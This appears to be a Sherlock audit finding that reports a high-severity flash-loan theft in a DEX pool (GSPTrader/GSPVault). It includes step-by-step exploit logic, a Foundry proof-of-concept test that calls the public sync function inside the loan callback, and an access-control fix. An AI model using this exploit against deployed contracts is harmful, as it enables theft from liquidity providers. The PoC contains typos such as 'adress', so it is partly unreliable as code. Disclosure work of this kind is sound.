mike-watson - Flash loan borrower can steal funds

[sherlock-admin]

mike-watson

high

Flash loan borrower can steal funds

Summary

The GSPTrader.sol contract is vulnerable to a flash loan exploit due to the public accessibility of the sync function in GSPVault.sol. This vulnerability allows a user to manipulate the contract state during a flash loan, potentially leading to the theft of funds.

Vulnerability Detail

The flash loan function in GSPTrader.sol can be exploited through the following steps:

1. The user obtains a flash loan.
2. The user calls the public sync function in GSPVault.sol, which synchronizes the reserves with the current token balances.
3. The user repays the flash loan with the exact _MT_FEE_BASE_ and _MT_FEE_QUOTE_ token amounts.
4. The require check in GSPTrader.sol passes because the balances match the reserves, allowing the flash loan to be successfully completed without actually returning the borrowed funds.

This exploit is made possible because the sync function can be called by any user, allowing them to manipulate the reserve balances during the flash loan process.

Impact

This vulnerability can lead to the theft of funds from the contract, as users can exploit the flash loan mechanism to withdraw more tokens than they return. It undermines the security and integrity of the flash loan process and the contract as a whole.

Code Snippet

• Location of Issue: GSPTrader.sol#L122-L128

• Relevant Code Section in GSPVault.sol:

  function sync() external nonReentrant {
    _sync();
  }

  POC exploit code - paste it in GPSTrader.t.sol

    function test_flashLoadSteal() public {
       vm.startPrank(DAI_WHALE);
      dai.transfer(USER, BASE_RESERVE + BASE_INPUT);
      vm.stopPrank();
      vm.startPrank(USDC_WHALE);
      usdc.transfer(USER, QUOTE_RESERVE + QUOTE_INPUT);
      vm.stopPrank();
  
      // User buys shares
      vm.startPrank(USER);
      dai.transfer(address(gsp), BASE_RESERVE);
      usdc.transfer(address(gsp), QUOTE_RESERVE);
      gsp.buyShares(USER);
  
       // flashloan - sellquote
      (uint256 amountBase, , ,) = gsp.querySellQuote(USER, QUOTE_INPUT);
      usdc.transfer(address(gsp), QUOTE_INPUT);
      gsp.flashLoan(amountBase + 1e18, 0, adress(this), "");
  }
  
   function DSPFlashLoanCall(
      address sender,
      uint256 baseAmount,
      uint256 quoteAmount,
      bytes calldata data
  ) external {
     vm.startPrank(USER);
     gsp.sync();
      dai.transfer(address(gsp), _MT_FEE_BASE_);
      usdc.transfer(address(gsp), _MT_FEE_QUOTE_);
  }

Tool used

Manual Review

Recommendation

Restrict the access to the sync function in GSPVault.sol to prevent it from being called by unauthorized users. This can be achieved by adding an access control mechanism, such as an onlyOwner or onlyAuthorized modifier. By limiting the public accessibility of the sync function, the contract can prevent malicious actors from manipulating the reserve balances during a flash loan, thereby safeguarding the funds and maintaining the integrity of the flash loan process.

Duplicate of #42